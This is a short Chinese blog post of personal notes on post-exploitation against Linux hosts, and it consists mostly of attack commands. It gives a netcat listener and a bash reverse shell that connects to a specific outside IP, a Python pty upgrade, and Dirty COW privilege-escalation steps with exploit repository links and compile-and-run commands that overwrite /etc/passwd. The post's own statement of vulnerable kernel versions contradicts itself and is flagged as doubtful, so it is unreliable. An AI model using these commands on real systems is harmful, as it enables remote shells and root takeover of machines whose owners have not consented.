后渗透攻击技巧

标准Shell

Linux在使用蚁剑开启的虚拟终端是非交互式的(not pty)

需要获取交互式shell

获取方式举例()

1
2
vps: nc -lvvp 9999
target: bash -i >&/dev/tcp/119.23.31.7/9999 0>&1

获取基础bash后可利用Python获取pty:

1
python -c 'import pty;pty.spawn("/bin/bash")'

脏牛提权

漏洞存在于Linux kernel >= 2.6.22 应该是<2.* ?存疑

有两个EXP,一个是可以写文件的,另外一个是修改etc/passwd的

修改etc/passwd:

利用链接

https://github.com/FireFart/dirtycow

1
2
gcc -pthread dirtycow.c -o dirtycow hello -lcrypt
./dirtycow hello

写入文件

利用链接

https://github.com/Rvn0xsy/reverse_dirty

本文标题:后渗透攻击技巧

文章作者:

发布时间:2020年12月11日 - 18:38:48

最后更新:2020年12月11日 - 18:50:10

原始链接:http://laker.xyz/2020/12/11/%E5%90%8E%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E6%8A%80%E5%B7%A7/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。